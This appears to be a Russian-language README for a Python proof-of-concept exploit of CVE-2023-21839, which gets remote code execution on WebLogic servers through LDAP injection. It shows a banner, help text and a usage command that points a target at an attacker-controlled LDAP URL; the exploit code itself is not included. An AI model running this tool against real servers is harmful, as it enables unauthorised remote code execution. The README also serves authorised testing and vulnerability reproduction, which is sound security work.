
Python эксплойт для проверки концепции для CVE-2023-21839, нацеленный на серверы WebLogic через LDAP injection для неаутентифицированного удаленного выполнения кода.
Следуя особым требованиям, перевёл GO-версию @4ra1n на Python, за что благодарю!
Данная программа предназначена только для авторизованного тестирования безопасности и исследовательских целей. Пожалуйста, соблюдайте закон о кибербезопасности при использовании.
Любые незаконные атаки или другие противоправные действия, совершённые с использованием этого инструмента, не являются ответственностью автора.
Воспроизведение vulhub: ссылка
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
